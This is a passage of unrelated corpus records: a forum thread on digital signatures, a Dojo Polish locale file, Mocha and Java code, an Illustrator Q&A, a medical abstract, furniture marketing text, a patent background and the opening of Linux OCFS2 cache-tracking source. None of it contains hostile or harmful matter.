able to prove that the letter/email came from you and was authorised by you. For the first, yes you can scan, crop and edit a piccy of your sig, save it as a jpg file and insert it into your document each time you produce one. Or you can open up Paint, and play with 'writing' your sig with a mouse until you have something that looks roughly similar. Again, save and use when required. For the second, it's far more tricky and you'd need a damn good reason to go down that route involving digital certificates and authentication etc. Far beyond my nouse I'm afraid. LE LE For a picture of your signature, the easiest thing to do is sign a blank piece of paper and use a scanner. I've always been a bit wary of this as anybody can lift your scanned signature but that's true of anything you sign these days. For a proper digital signature, you need to get a X.509 certificate and import it into your PC. It's easier than it sounds and you can get a free certificate to try out at What is SSL Encryption? The web site will guide you through the steps to install the certificate on your PC. It only takes a few minutes. You can get a "proper" certificate from credit reference companies like Experian for about £25 a year. Experian will verify your identity before issuing the certificate. The free certificate will verify that your signed document has not been changed and the Experian certificate will also verify that you are who you say you are. Once the certificate is installed, you can use it with any application that allows you to sign documents. Word, Outlook, Adobe etc all allow you to do this. The trouble is that many of these applications change received documents without asking. Outlook will strip out extra new lines and spaces automatically. This will cause the signature to fail authentication and the user will be notified that the document doesn't match the signature. Digital signatures are a fine idea in theory but, in practice, they can be more trouble than they are worth. Giving forgery alerts because Word trimmed an extra trailing space from one paragraph in a 100 page document becomes tiresome. Trying out a free certificate from Comodo to see if digital signatures meet your needs might be the way to go for you.
{ "pile_set_name": "Pile-CC" }
define( //begin v1.x content { "days-standAlone-short": [ "niedz.", "pon.", "wt.", "śr.", "czw.", "pt.", "sob." ], "quarters-standAlone-narrow": [ "K1", "K2", "K3", "K4" ], "field-weekday": "Dzień tygodnia", "dateFormatItem-GyMMMEd": "E, d MMM y G", "dateFormatItem-MMMEd": "E, d MMM", "days-format-short": [ "niedz.", "pon.", "wt.", "śr.", "czw.", "pt.", "sob." ], "dateFormat-long": "d MMMM y G", "months-format-wide": [ "Tiszri", "Cheszwan", "Kislew", "Tewet", "Szwat", "Adar I", "Adar", "Nisan", "Ijar", "Siwan", "Tamuz", "Aw", "Elul" ], "dateFormatItem-yyyyQQQ": "QQQ y G", "dateTimeFormat-medium": "{1}, {0}", "dateFormat-full": "EEEE, d MMMM y G", "dateFormatItem-yyyyMEd": "E, d.MM.y G", "dateFormatItem-Md": "d.MM", "field-era": "Era", "months-standAlone-wide": [ "Tiszri", "Cheszwan", "Kislew", "Tewet", "Szwat", "Adar I", "Adar", "Nisan", "Ijar", "Siwan", "Tamuz", "Aw", "Elul" ], "quarters-format-wide": [ "I kwartał", "II kwartał", "III kwartał", "IV kwartał" ], "field-year": "Rok", "field-hour": "Godzina", "months-format-abbr-leap": "Adar II", "months-format-abbr": [ "Tiszri", "Cheszwan", "Kislew", "Tewet", "Szwat", "Adar I", "Adar", "Nisan", "Ijar", "Siwan", "Tamuz", "Aw", "Elul" ], "field-day-relative+0": "Dzisiaj", "field-day-relative+1": "Jutro", "dateFormatItem-GyMMMd": "d MMM y G", "field-day-relative+2": "Pojutrze", "months-standAlone-abbr": [ "Tiszri", "Cheszwan", "Kislew", "Tewet", "Szwat", "Adar I", "Adar", "Nisan", "Ijar", "Siwan", "Tamuz", "Aw", "Elul" ], "quarters-format-abbr": [ "K1", "K2", "K3", "K4" ], "quarters-standAlone-wide": [ "I kwartał", "II kwartał", "III kwartał", "IV kwartał" ], "dateFormatItem-Gy": "y G", "dateFormatItem-yyyyMMMEd": "E, d MMM y G", "days-standAlone-wide": [ "niedziela", "poniedziałek", "wtorek", "środa", "czwartek", "piątek", "sobota" ], "dateFormatItem-yyyyMMM": "LLL y G", "dateFormatItem-yyyyMMMd": "d MMM y G", "months-standAlone-wide-leap": "Adar II", "quarters-standAlone-abbr": [ "1 kw.", "2 kw.", "3 kw.", "4 kw." ], "field-minute": "Minuta", "field-dayperiod": "Dayperiod", "days-standAlone-abbr": [ "niedz.", "pon.", "wt.", "śr.", "czw.", "pt.", "sob." ], "field-day-relative+-1": "Wczoraj", "dateFormatItem-h": "hh a", "field-day-relative+-2": "Przedwczoraj", "dateFormatItem-MMMd": "d MMM", "dateFormatItem-MEd": "E, d.MM", "field-day": "Dzień", "days-format-wide": [ "niedziela", "poniedziałek", "wtorek", "środa", "czwartek", "piątek", "sobota" ], "field-zone": "Strefa", "dateFormatItem-y": "y G", "field-year-relative+-1": "Zeszły rok", "field-month-relative+-1": "Zeszły miesiąc", "dateFormatItem-hm": "hh:mm a", "days-format-abbr": [ "niedz.", "pon.", "wt.", "śr.", "czw.", "pt.", "sob." ], "days-format-narrow": [ "N", "P", "W", "Ś", "C", "P", "S" ], "dateFormatItem-yyyyMd": "d.MM.y G", "field-month": "Miesiąc", "days-standAlone-narrow": [ "N", "P", "W", "Ś", "C", "P", "S" ], "dateFormat-short": "dd.MM.y G", "field-second": "Sekunda", "field-month-relative+0": "Bieżący miesiąc", "field-month-relative+1": "Przyszły miesiąc", "dateFormatItem-Ed": "E, d", "field-week": "Tydzień", "dateFormat-medium": "d MMM y G", "field-year-relative+0": "Bieżący rok", "field-week-relative+-1": "Zeszły tydzień", "dateFormatItem-yyyyM": "MM.y G", "field-year-relative+1": "Przyszły rok", "dateFormatItem-yyyyQQQQ": "QQQQ y G", "dateTimeFormat-short": "{1}, {0}", "dateFormatItem-hms": "hh:mm:ss a", "months-format-wide-leap": "Adar II", "dateFormatItem-GyMMM": "LLL y G", "dateFormatItem-yyyy": "y G", "field-week-relative+0": "Bieżący tydzień", "field-week-relative+1": "Przyszły tydzień" } //end v1.x content );
{ "pile_set_name": "Github" }
Q: how do I assert that a function was called? I have a Goat class: class Goat constructor: (@headbutt) -> @isCranky = true approach: -> if @isCranky @headbutt() I'd like to write a Mocha test to assert that headbutt() was called if isCranky is true and approach is called. The only explanation I can find for this is in Ruby. Tried translating it, but failed. How can I assert that the correct function was called? I think I can solve it in a hacky way, but would rather learn the right way. Suggestions? A: How about? describe 'Goat', -> it 'should call headbutt when approached', -> headbuttCalled = no headbutt = -> headbuttCalled = true goat = new Goat headbutt goat.approach() assert headbuttCalled If you find yourself repeating many times this pattern of testing whether a function was called, you'd probably want to use something like SinonJS, which provides a "spy" construct: headbutt = sinon.spy() goat = new Goat headbutt goat.approach() assert headbutt.called
{ "pile_set_name": "StackExchange" }
package mediathek.tool; import java.math.BigDecimal; import java.math.BigInteger; import java.math.RoundingMode; import static org.apache.commons.io.FileUtils.*; /** * This code is inspired by * custom Implementation of FileUtils.byteCountToDisplaySize to fix rounding bug * taken from https://issues.apache.org/jira/browse/IO-373 (2019-09-20) * post from Sammy Trojette, 2016-11-01-10-09 * <p> * quote: * Since this has just come up as an issue on our current project. I'd like to do a little necro here. * With this version, the displayed value is always set at least 3 numericals so: ####, ###, ##.# or #.##. * If anyone sees a serious issue, please give me a call. * <p> * -- * Well, what Sammy Trojette did, is not actually exactly what e.g. Windows does. * 1) Windows will round down, at least in displaying free space and when displaying file properties. * Rounding mode half up is not used here. * e.g. 2^30 B is displayed as 1 TB, * but (2^30-1) B is displayed as 0.99 TB * 2) Windows will not display 4 digits in file properties, * i.e. there is no displaying #,### UNIT. * Display will reduce to 3 digits and thus display will be 0.## NEXTUNIT instead. * <p> * For every value less than 1000 YiB (which corresponds to ~ 10^15 discs with 1 TB capacity each), * what this tool will give is always of the form ### UNIT, ##.# UNIT or #.## UNIT * <p> * (if you had a disc with 1 TB capacity sized a cube of length 1cm, * that would be a cube of 10^5 cm side length, or 1000m.) */ public class ByteUnitUtil { private static final int DIVISION_SCALE = 2; // we will never need more than 2 decimal digits for display private static final RoundingMode ROUNDING_MODE = RoundingMode.DOWN; // rounding down! i.e. (2^30-1) B is to be displayed as 0.99 TB /** * Formats a file's size into a human readable format * * @param fileSize the file's size as long * @return the size as human readable string */ public static String byteCountToDisplaySize(final long fileSize) { return byteCountToDisplaySize(BigInteger.valueOf(fileSize)); } /** * Formats a file's size into a human readable format * * @param fileSizeBytes the file's size as BigInteger * @return the size as human readable string */ public static String byteCountToDisplaySize(final BigInteger fileSizeBytes) { ByteUnit byteUnit = getMatchingUnitRange(fileSizeBytes); BigDecimal fileSizeInUnit = getFileSizeInUnit(fileSizeBytes, byteUnit); // testing purposes // System.out.print("fileSizeBytes = " + fileSizeBytes.toString()); // System.out.print(" bitLength = " + fileSizeBytes.bitLength()); // System.out.print(" byteUnit = " + byteUnit.name()); // System.out.println(); String numberAsText = getRoundedFileSizeInUnit(fileSizeInUnit); numberAsText = prettyPrintRoundedFileSizeInUnit(numberAsText); String byteUnitName = byteUnit.unitName(); return String.format("%s %s", numberAsText, byteUnitName); } private static ByteUnit getMatchingUnitRange(BigInteger fileSizeBytes) { // compute floor(log2(filSizeBytes)) to get to a raw slot. int bitLength = fileSizeBytes.bitLength(); ByteUnit byteUnitRaw = ByteUnit.fromBitLength(bitLength); // tested with MS Windows: // OS will use the next higher byte unit prefix if more than 3 predecimal places would be required to represent size // so, if the fileSize is 1000 times the minimum size of the byte unit or more, // imitate OS behavior and step up to the next byte unit BigInteger bytesRawUnit = byteUnitRaw.byteCount(); BigInteger thousandTimesRawUnit = bytesRawUnit.multiply(BigInteger.valueOf(1000)); if (fileSizeBytes.compareTo(thousandTimesRawUnit) >= 0) { // System.out.print("exceeding 3-digit scale."); // System.out.println("Switch from " + byteUnitRaw.name() + " to next byteUnit " + byteUnitRaw.next().name()); return byteUnitRaw.next(); } return byteUnitRaw; } private static BigDecimal getFileSizeInUnit(final BigInteger fileSizeBytes, ByteUnit byteUnit) { // compute the factor, how many times the byte count of the byte unit do we have (rounded to a few decimal places) BigDecimal fileSizeBytes_bd = new BigDecimal(fileSizeBytes); BigDecimal byteUnitCount_bd = new BigDecimal(byteUnit.byteCount()); return fileSizeBytes_bd.divide(byteUnitCount_bd, DIVISION_SCALE, ROUNDING_MODE); } private static String getRoundedFileSizeInUnit(BigDecimal fileSizeInUnit) { // always round so that 3 digits are displayed (###, ##.#, #.##) // partition interval [0,1000[ into three sections: // [0,10[ , [10,100[, [100, 1000[ (1 predecimal place, 2 predecimal places, 3 or 4 predecimal places) // [1000, 1024[ can not occur by design of getMatchingUnitRange if (fileSizeInUnit.compareTo(BigDecimal.valueOf(100.0)) >= 0) { // fileSizeInUnit with 3 predecimal places, i.e. it's in interval [100, 999[ : do not display any decimal places return fileSizeInUnit.setScale(0, ROUNDING_MODE).toString(); } else if (fileSizeInUnit.compareTo(BigDecimal.valueOf(10.0)) >= 0) { // fileSizeInUnit with 2 predecimal places, i.e. it's in interval [10,100[ : display the first decimal place only return fileSizeInUnit.setScale(1, ROUNDING_MODE).toString(); } else { // fileSizeInUnit with 1 predecimal places, i.e. it's in interval [0,10[ : display the first two decimal places return fileSizeInUnit.setScale(2, ROUNDING_MODE).toString(); } } private static String prettyPrintRoundedFileSizeInUnit(String val) { // trim trailing zeros if (val.endsWith(".00")) { return val.substring(0, val.length() - 3); } else if (val.endsWith(".0")) { return val.substring(0, val.length() - 2); } // else: for #.#0, the trailing 0 is not truncated return val; } // enumerate Byte units with // - the size of binary prefixes (the 1024 thingy) see // - the names of the more commonly known decimal prefixes (the 1000 thingy) // // sizes // see https://de.wikipedia.org/wiki/Bin%C3%A4rpr%C3%A4fix // and see org.apache.commons.io.FileUtils for actual definitions of the constants used used here // // names // see https://de.wikipedia.org/wiki/Vors%C3%A4tze_f%C3%BCr_Ma%C3%9Feinheiten enum ByteUnit { // please note: // this enumeration deliberately makes a systematic error, confusing // decimal prefixes kilo, mega, giga, ... (used here for the unit prefix text) // and binary prefixes kibi, mebi, gibi, ... (used here for the number of bytes) // see https://de.wikipedia.org/wiki/Byte#Vergleich ... // but- how many people who are not computer scientists / it-specialists // do you know that have ever even heard of Mebibytes and Gibibytes ? // let's face it: for most people MiB is a Hollywood movie, // and for the rest of them ... please wait for the red light to flash. BRB. Just adjusting my sunglasses... BYTE("bytes", BigInteger.ONE), // no unit prefix means no prefix confusion and hence 0% error KILOBYTE("kB", ONE_KB_BI), // strictly speaking a KiB (2^10 B) not a kB (10^3 B) - 2.4% error! (lower case k in kB! upper case K in KiB)) MEGABYTE("MB", ONE_MB_BI), // strictly speaking a MiB (2^20 B) not a MB (10^6 B) - 4.9% error! GIGABYTE("GB", ONE_GB_BI), // strictly speaking a GiB (2^30 B) not a GB (10^9 B) - 7.4% error! TERABYTE("TB", ONE_TB_BI), // strictly speaking a TiB (2^40 B) not a TB (10^12 B) - 10.0% error! PETABYTE("PB", ONE_PB_BI), // strictly speaking a PiB (2^50 B) not a PB (10^15 B) - 12.6% error! EXABYTE("EB", ONE_EB_BI), // strictly speaking a EiB (2^60 B) not a EB (10^18 B) - 15.3% error! // well, BigInteger may allow arbitrary precision with the shortcoming of non-hardware support for arithmetics. // and hence less performance. Why not compute using long? On the other hand, // if this tool is not called millions of times, performance should not be a real issue here. // With long (64 bit), we can actually handle up to 8 EiB. In other words 8 million discs with 1TB capacity each. // however, this tool is meant as an alternative for org.apache.commons.io.FileUtils.byteCountToDisplaySize // which accepts BigINteger input. To resemble that interface, this also uses BigInteger internally. // so, if we are talking BigInteger, let's not stop with 64-bit file sizes and according limit to byte units. // There is more: ZETTABYTE("ZB", ONE_ZB), // strictly speaking a ZiB (2^70 B) not a ZB (10^21 B) - 18.1% error! YOTTABYTE("YB", ONE_YB), // strictly speaking a YiB (2^80 B) not a YB (10^24 B) - 20.9% error! // end of prefixes defined by BIPM. More to come 2022 on next BIPM general convention? ; private final String unitName; // decimal unit name private final BigInteger byteCount; // binary unit size ByteUnit(String unitName, BigInteger byteCount) { this.unitName = unitName; this.byteCount = byteCount; } // "logarithmic" getter static ByteUnit fromBitLength(int bitLength) { // bitLength of a positive integer is something like a rounded down binary logarithm // special case: BigInteger.ZERO has bitLength 0, not "negative infinity". // the unit prefixes apply to intervals of 10 bits // [0 bits and 1-10 bits], [11 bits - 20 bits], [21 bits - 30 bits], [31 bits - 40 bits], ... // Bytes , KibiBytes , MebiBytes , GibiBytes int ordinalRaw = Math.max(bitLength - 1, 0) / 10; // BigInteger.ZERO has bitLength 0. map 0 bits to bucket 0 ("BYTE") int ordinal = Math.min(ordinalRaw, values().length - 1); // logarithm can be infinite. stop at the largest defined prefix. // System.out.println("fromBitLength ordinal: " + ordinal + " -> " + byteUnit.name()); return values()[ordinal]; } ByteUnit previous() { return values()[Math.max(ordinal() - 1, 0)]; } ByteUnit next() { return values()[Math.min(ordinal() + 1, values().length - 1)]; } private String unitName() { return unitName; } private BigInteger byteCount() { return byteCount; } } }
{ "pile_set_name": "Github" }
Q: illustrator cs6: cut through multiple layers with top layer I have a vector with multiple layers, through all of which I want to cut through using the top-most layer's shape so that there is a transparent void through the entire design. So far I have been copying and pasting the top shape and using the "Minus from front" option in the Pathfinder to achieve the desired result. However, for a design with 20+ layers to cut through, this process gets tediously mundane. I have tried to "Minus from front" through entire groups of layers, but way more than just the outline of the top layer's shape seems to get removed. So I am wondering if there is a way to cut through groups of layers in one foul swoop, and if so how can it be done? I am basically creating picture frames, so that I can open them in GIMP/photoshop and simply put layers of photos underneath the rasterized vectors. A: I could suggest you another method for your end product. You Could use clipping mask for creating Void in your entire design. How to Do this? Group all your Objects or layers except the top layer which you want to create void Create another object above your design that covers all your artwork and with the help of pathfinder select the void object and minus from current object Now select your grouped object and the top object then Right click and select Make clipping mask DONE!
{ "pile_set_name": "StackExchange" }
Nonionic contrast medium: effects on blood coagulation and complement activation in vitro. A nonionic contrast medium was evaluated in vitro for its effects on coagulation and complement activation in comparison to a low osmolal contrast agent. In clotting assays each contrast medium was mixed with blood and clotting parameters were analyzed by using a thromboelastographic machine. Platelet function was studied by incubating platelet-rich plasma with individual contrast medium, and the subsequent challenge of a platelet aggregating agent. Complement activation was assessed by the hydrolysis of C3 protein into C3c fragment in contrast medium-incubated serum. Immunoelectrophoresis was used to detect C3c protein. Both the nonionic contrast medium and the low osmolal contrast agent acted as anticoagulant and antiplatelet agents, however, results with the low osmolal contrast agent were more pronounced compared to the nonionic contrast medium. Even at nonphysiologic concentration of contrast medium, no significant conversion at C3 to C3c was seen. Since these two agents caused hypocoagulable states in vitro, it is likely that patients with thrombocytopenia, severe liver disease and with clotting factor deficiencies may present hemostatic complications during angiographic procedures.
{ "pile_set_name": "PubMed Abstracts" }
At this time Abruko is going to present you one of 12 beautiful inspirations Antique Drop Front Secretary Desk which hopefully be able to present you a good strategy to enhance your furniture area. Along side others 11, one of our staff abruko showcased a beautiful view of antique drop front desk and also antique oak drop front writing desk inspirations, Brown Wooden Antique Drop Front Secretary Desk In A Traditional Design. Including one you are seeing right now, these wonderful 12 furniture inspirations can be discovered at under in gallery of Antique Drop Front Secretary Desk. Some of them are nice brown wooden antique drop front secretary desk, small brown wooden antique drop front secretary desk plus rustic brown wooden antique drop front secretary desk. Antique drop front secretary desk is the special additional furniture for your home. So, buying this desk can be very good because you have a piece of the history in your home. Besides it has the unique and beautiful appearance, this is very useful. Usually, this antique drop front secretary desk... [Read More] Write a comment Pull out shelves for pantry can increase the value of your kitchen. Most of us feel difficult organizing the kitchen cabinets and pantry. You know that this cabinet is difficult to arrange. You can choose this pull out shelves to be installed in your home. You don’t need to do the modification. There... [Read More] Small room will be amazing if you add the round end table with drawers. It is multifunctional so it is suitable for your minimalist home. It is more functions. It is not only for your living room, but also it can be used in a bedroom. In the drawers, some small items you have can be stored there. The... [Read More] Outdoor furniture for small space should be thought carefully. You need the great outdoor furniture for your patio. There, you can get relaxation there. If you have the outdoor furniture for small space that is so comfortable, you will enjoy your day in the home. Many people choose the outdoor patio... [Read More] Vanity desk with lighted mirror is an interesting furniture item. It is more than the usual conventional vanity. The existence of the lighted mirror increases this function. You can see your face detailed. You can put your make up perfectly with this item. There are some variation designs of the vanity... [Read More] Rustic bar stools with back is an amazing stool for you. Nowadays, many people make the own bar in their home. Even, you can use this bar stool in a kitchen. Rustic theme is chosen because it gives the amazing look. Many people love this theme as their choice. You need to pay attention about the height... [Read More] Buying the furniture for your home should be careful because it is an expensive process. Before buying this item, you need to think every item detailed. It is important for you to choose the dining table set in a strong and good design. There are some important things you can think for helping you in... [Read More] Toddler swing and slide set is really interesting. Many kids love this toddler set. You need to choose the strong one. Plastic is the cheap and strong material you can choose. Many parents choose it as their kid. There are some benefits you will get from this toddler. This is the good investment for... [Read More] Over the door spice racks is the new innovation. It will be so great for your kitchen. This is the best solution for you when you need to have the practical thing for space saving in the kitchen. If you have this spice racks, some spices and ingredients are placed in one area. So, you can find it easily... [Read More] Primitive curtains for living room become the choice of many people. It makes the appearance of the living room so amazing. The guest will focus on this item. No wonder if there are many homeowners want to have the interesting and beautiful curtain for living room. The primitive design can be your choice. You... [Read More] Red white and blue bedding is one interesting design you can choose. This is so interesting. You will get the stylish and amazing bedroom with this item. Changing the look of the room will be easy when you can get the perfect bedding. The combination colors will look so nice. It gives the different look... [Read More] Rug on top of carpet will make your room more comfortable and beautiful. It is the evidence that the furniture is a tone of the room. The furniture pieces for your room are in so many. You should be smart in choosing which kind of the furniture item you will use. The rug will add the comfort to your... [Read More] Buying the furniture for your home should be careful because it is an expensive process. Before buying this item, you need to think every item detailed. It is important for you to choose the dining table set in a strong and good design. There are some important things you can think for helping you in... [Read More] Pull out shelves for pantry can increase the value of your kitchen. Most of us feel difficult organizing the kitchen cabinets and pantry. You know that this cabinet is difficult to arrange. You can choose this pull out shelves to be installed in your home. You don’t need to do the modification. There... [Read More] Many mothers want to have rocking chair for baby room. They use it for their baby. When they lull their baby, they will feel comfortable. You can do some activities with this rocking chair such as singing songs, feeding them or reading stories. Your baby will feel comfortable on you. You need to have... [Read More] Toddler swing and slide set is really interesting. Many kids love this toddler set. You need to choose the strong one. Plastic is the cheap and strong material you can choose. Many parents choose it as their kid. There are some benefits you will get from this toddler. This is the good investment for... [Read More] Outdoor furniture for small space should be thought carefully. You need the great outdoor furniture for your patio. There, you can get relaxation there. If you have the outdoor furniture for small space that is so comfortable, you will enjoy your day in the home. Many people choose the outdoor patio... [Read More]
{ "pile_set_name": "Pile-CC" }
Selective Catalyst Reduction (SCR) catalysts and liquid reductant (e.g., hydrocarbon or urea solution) injected into engine exhaust ducts may be used for reducing engine-out NOx emissions. However, heat from the engine exhaust may cause reductant injectors to overheat and may cause solids to deposit on the injector tip. The solid deposits may in turn result in clogging of the injector orifice. One approach used to address injector overheating may be to use a small V-band clamp for connecting the injector and its mounting structure to the exhaust passage. The V-band serves to potentially insulate the injector from engine exhaust heat, thereby reducing solid deposit buildup. However, the inventors herein have recognized that connecting the injector to the mounting structure using a V-band clamp may require special tools and may be too cumbersome to allow fast and easy assembly in a mass production environment. Likewise, premature degradation of the V-band clamp, due to assembly installation variation, for example, may increase exhaust leakage. A system for injecting from an injector into a duct of an engine system is provided herein to at least partially address above mentioned issues. The system may include a first flange on a duct connection side, a second flange on an injector connection side, a stand-off separating the first flange from the second flange to form an air gap therebetween, and a seal offset from at least one of the first and the second flanges and located within the air gap and between the first flange and the second flange. In this way, it is possible to obtain a reliable, robust, and time-efficient connection of the injector with reduced contact surface area between potentially high temperature injector components and the injector via the seal positioned in the air gap formed by the stand-off.
{ "pile_set_name": "USPTO Backgrounds" }
/* -*- mode: c; c-basic-offset: 8; -*- * vim: noexpandtab sw=8 ts=8 sts=0: * * uptodate.c * * Tracking the up-to-date-ness of a local buffer_head with respect to * the cluster. * * Copyright (C) 2002, 2004, 2005 Oracle. All rights reserved. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. * * You should have received a copy of the GNU General Public * License along with this program; if not, write to the * Free Software Foundation, Inc., 59 Temple Place - Suite 330, * Boston, MA 021110-1307, USA. * * Standard buffer head caching flags (uptodate, etc) are insufficient * in a clustered environment - a buffer may be marked up to date on * our local node but could have been modified by another cluster * member. As a result an additional (and performant) caching scheme * is required. A further requirement is that we consume as little * memory as possible - we never pin buffer_head structures in order * to cache them. * * We track the existence of up to date buffers on the inodes which * are associated with them. Because we don't want to pin * buffer_heads, this is only a (strong) hint and several other checks * are made in the I/O path to ensure that we don't use a stale or * invalid buffer without going to disk: * - buffer_jbd is used liberally - if a bh is in the journal on * this node then it *must* be up to date. * - the standard buffer_uptodate() macro is used to detect buffers * which may be invalid (even if we have an up to date tracking * item for them) * * For a full understanding of how this code works together, one * should read the callers in dlmglue.c, the I/O functions in * buffer_head_io.c and ocfs2_journal_access in journal.c */ #include <linux/fs.h> #include <linux/types.h> #include <linux/slab.h> #include <linux/highmem.h> #include <linux/buffer_head.h> #include <linux/rbtree.h> #include <cluster/masklog.h> #include "ocfs2.h" #include "inode.h" #include "uptodate.h" #include "ocfs2_trace.h" struct ocfs2_meta_cache_item { struct rb_node c_node; sector_t c_block; }; static struct kmem_cache *ocfs2_uptodate_cachep; u64 ocfs2_metadata_cache_owner(struct ocfs2_caching_info *ci) { BUG_ON(!ci || !ci->ci_ops); return ci->ci_ops->co_owner(ci); } struct super_block *ocfs2_metadata_cache_get_super(struct ocfs2_caching_info *ci) { BUG_ON(!ci || !ci->ci_ops); return ci->ci_ops->co_get_super(ci); } static void ocfs2_metadata_cache_lock(struct ocfs2_caching_info *ci) { BUG_ON(!ci || !ci->ci_ops); ci->ci_ops->co_cache_lock(ci); } static void ocfs2_metadata_cache_unlock(struct ocfs2_caching_info *ci) { BUG_ON(!ci || !ci->ci_ops); ci->ci_ops->co_cache_unlock(ci); } void ocfs2_metadata_cache_io_lock(struct ocfs2_caching_info *ci) { BUG_ON(!ci || !ci->ci_ops); ci->ci_ops->co_io_lock(ci); } void ocfs2_metadata_cache_io_unlock(struct ocfs2_caching_info *ci) { BUG_ON(!ci || !ci->ci_ops); ci->ci_ops->co_io_unlock(ci); } static void ocfs2_metadata_cache_reset(struct ocfs2_caching_info *ci, int clear) { ci->ci_flags |= OCFS2_CACHE_FL_INLINE; ci->ci_num_cached = 0; if (clear) { ci->ci_created_trans = 0; ci->ci_last_trans = 0; } } void ocfs2_metadata_cache_init(struct ocfs2_caching_info *ci, const struct ocfs2_caching_operations *ops) { BUG_ON(!ops); ci->ci_ops = ops; ocfs2_metadata_cache_reset(ci, 1); } void ocfs2_metadata_cache_exit(struct ocfs2_caching_info *ci) { ocfs2_metadata_cache_purge(ci); ocfs2_metadata_cache_reset(ci, 1); } /* No lock taken here as 'root' is not expected to be visible to other * processes. */ static unsigned int ocfs2_purge_copied_metadata_tree(struct rb_root *root) { unsigned int purged = 0; struct rb_node *node; struct ocfs2_meta_cache_item *item; while ((node = rb_last(root)) != NULL) { item = rb_entry(node, struct ocfs2_meta_cache_item, c_node); trace_ocfs2_purge_copied_metadata_tree( (unsigned long long) item->c_block); rb_erase(&item->c_node, root); kmem_cache_free(ocfs2_uptodate_cachep, item); purged++; } return purged; } /* Called from locking and called from ocfs2_clear_inode. Dump the * cache for a given inode. * * This function is a few more lines longer than necessary due to some * accounting done here, but I think it's worth tracking down those * bugs sooner -- Mark */ void ocfs2_metadata_cache_purge(struct ocfs2_caching_info *ci) { unsigned int tree, to_purge, purged; struct rb_root root = RB_ROOT; BUG_ON(!ci || !ci->ci_ops); ocfs2_metadata_cache_lock(ci); tree = !(ci->ci_flags & OCFS2_CACHE_FL_INLINE); to_purge = ci->ci_num_cached; trace_ocfs2_metadata_cache_purge( (unsigned long long)ocfs2_metadata_cache_owner(ci), to_purge, tree); /* If we're a tree, save off the root so that we can safely * initialize the cache. We do the work to free tree members * without the spinlock. */ if (tree) root = ci->ci_cache.ci_tree; ocfs2_metadata_cache_reset(ci, 0); ocfs2_metadata_cache_unlock(ci); purged = ocfs2_purge_copied_metadata_tree(&root); /* If possible, track the number wiped so that we can more * easily detect counting errors. Unfortunately, this is only * meaningful for trees. */ if (tree && purged != to_purge) mlog(ML_ERROR, "Owner %llu, count = %u, purged = %u\n", (unsigned long long)ocfs2_metadata_cache_owner(ci), to_purge, purged); } /* Returns the index in the cache array, -1 if not found. * Requires ip_lock. */ static int ocfs2_search_cache_array(struct ocfs2_caching_info *ci, sector_t item) { int i; for (i = 0; i < ci->ci_num_cached; i++) { if (item == ci->ci_cache.ci_array[i]) return i; } return -1; } /* Returns the cache item if found, otherwise NULL. * Requires ip_lock. */ static struct ocfs2_meta_cache_item * ocfs2_search_cache_tree(struct ocfs2_caching_info *ci, sector_t block) { struct rb_node * n = ci->ci_cache.ci_tree.rb_node; struct ocfs2_meta_cache_item *item = NULL; while (n) { item = rb_entry(n, struct ocfs2_meta_cache_item, c_node); if (block < item->c_block) n = n->rb_left; else if (block > item->c_block) n = n->rb_right; else return item; } return NULL; } static int ocfs2_buffer_cached(struct ocfs2_caching_info *ci, struct buffer_head *bh) { int index = -1; struct ocfs2_meta_cache_item *item = NULL; ocfs2_metadata_cache_lock(ci); trace_ocfs2_buffer_cached_begin( (unsigned long long)ocfs2_metadata_cache_owner(ci), (unsigned long long) bh->b_blocknr, !!(ci->ci_flags & OCFS2_CACHE_FL_INLINE)); if (ci->ci_flags & OCFS2_CACHE_FL_INLINE) index = ocfs2_search_cache_array(ci, bh->b_blocknr); else item = ocfs2_search_cache_tree(ci, bh->b_blocknr); ocfs2_metadata_cache_unlock(ci); trace_ocfs2_buffer_cached_end(index, item); return (index != -1) || (item != NULL); } /* Warning: even if it returns true, this does *not* guarantee that * the block is stored in our inode metadata cache. * * This can be called under lock_buffer() */ int ocfs2_buffer_uptodate(struct ocfs2_caching_info *ci, struct buffer_head *bh) { /* Doesn't matter if the bh is in our cache or not -- if it's * not marked uptodate then we know it can't have correct * data. */ if (!buffer_uptodate(bh)) return 0; /* OCFS2 does not allow multiple nodes to be changing the same * block at the same time. */ if (buffer_jbd(bh)) return 1; /* Ok, locally the buffer is marked as up to date, now search * our cache to see if we can trust that. */ return ocfs2_buffer_cached(ci, bh); } /* * Determine whether a buffer is currently out on a read-ahead request. * ci_io_sem should be held to serialize submitters with the logic here. */ int ocfs2_buffer_read_ahead(struct ocfs2_caching_info *ci, struct buffer_head *bh) { return buffer_locked(bh) && ocfs2_buffer_cached(ci, bh); } /* Requires ip_lock */ static void ocfs2_append_cache_array(struct ocfs2_caching_info *ci, sector_t block) { BUG_ON(ci->ci_num_cached >= OCFS2_CACHE_INFO_MAX_ARRAY); trace_ocfs2_append_cache_array( (unsigned long long)ocfs2_metadata_cache_owner(ci), (unsigned long long)block, ci->ci_num_cached); ci->ci_cache.ci_array[ci->ci_num_cached] = block; ci->ci_num_cached++; } /* By now the caller should have checked that the item does *not* * exist in the tree. * Requires ip_lock. */ static void __ocfs2_insert_cache_tree(struct ocfs2_caching_info *ci, struct ocfs2_meta_cache_item *new) { sector_t block = new->c_block; struct rb_node *parent = NULL; struct rb_node **p = &ci->ci_cache.ci_tree.rb_node; struct ocfs2_meta_cache_item *tmp; trace_ocfs2_insert_cache_tree( (unsigned long long)ocfs2_metadata_cache_owner(ci), (unsigned long long)block, ci->ci_num_cached); while(*p) { parent = *p; tmp = rb_entry(parent, struct ocfs2_meta_cache_item, c_node); if (block < tmp->c_block) p = &(*p)->rb_left; else if (block > tmp->c_block) p = &(*p)->rb_right; else { /* This should never happen! */ mlog(ML_ERROR, "Duplicate block %llu cached!\n", (unsigned long long) block); BUG(); } } rb_link_node(&new->c_node, parent, p); rb_insert_color(&new->c_node, &ci->ci_cache.ci_tree); ci->ci_num_cached++; } /* co_cache_lock() must be held */ static inline int ocfs2_insert_can_use_array(struct ocfs2_caching_info *ci) { return (ci->ci_flags & OCFS2_CACHE_FL_INLINE) && (ci->ci_num_cached < OCFS2_CACHE_INFO_MAX_ARRAY); } /* tree should be exactly OCFS2_CACHE_INFO_MAX_ARRAY wide. NULL the * pointers in tree after we use them - this allows caller to detect * when to free 